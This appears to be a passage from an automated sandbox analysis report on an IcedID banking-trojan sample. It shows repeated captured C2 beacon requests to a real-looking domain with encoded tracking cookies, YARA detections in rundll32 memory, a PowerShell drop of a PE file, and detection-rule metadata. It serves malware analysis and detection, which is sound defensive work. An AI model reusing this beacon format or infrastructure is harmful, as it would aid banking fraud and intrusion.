            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86CHost: kropnagursa.com

            E-Banking Fraud

            barindex
            Yara detected IcedID
            Source: Yara matchFile source: 0000000A.00000003.541445122.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.594455037.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.555534226.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.721823197.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.560733182.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.531693872.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612994519.0000017521BC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.497608477.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.543079236.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.536679847.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.584413640.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.500443586.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.494814109.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.546261720.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.581334234.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.499065524.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.601363468.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.520814674.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.606794312.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.592288032.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.600571140.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.528524217.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.590819954.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.621728773.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.612925082.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.557676790.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000003.493439373.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5848, type: MEMORYSTR
            Source: Yara matchFile source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPE

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
            Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
            Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
            Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
            Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
            Source: 0000000A.00000002.836565283.0000017523534000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 5848, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\MZvYng.binJump to dropped file
            Source: amsi32_2100.amsi.csv, type: OTHERMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240, modified = 2023-01-27
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
            Source: 10.2.rundll32.exe.17521b4ba80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240, modified = 2023-01-27
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
            Source: 10.2.rundll32.exe.17521b4ba80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
            Source: 00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
            Source: 00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
            Source: 00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
            Source: 00000001.00000003.311152361.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth (Nextron Systems), description = Detects obfuscated PowerShell hacktools, score = , reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-06-12
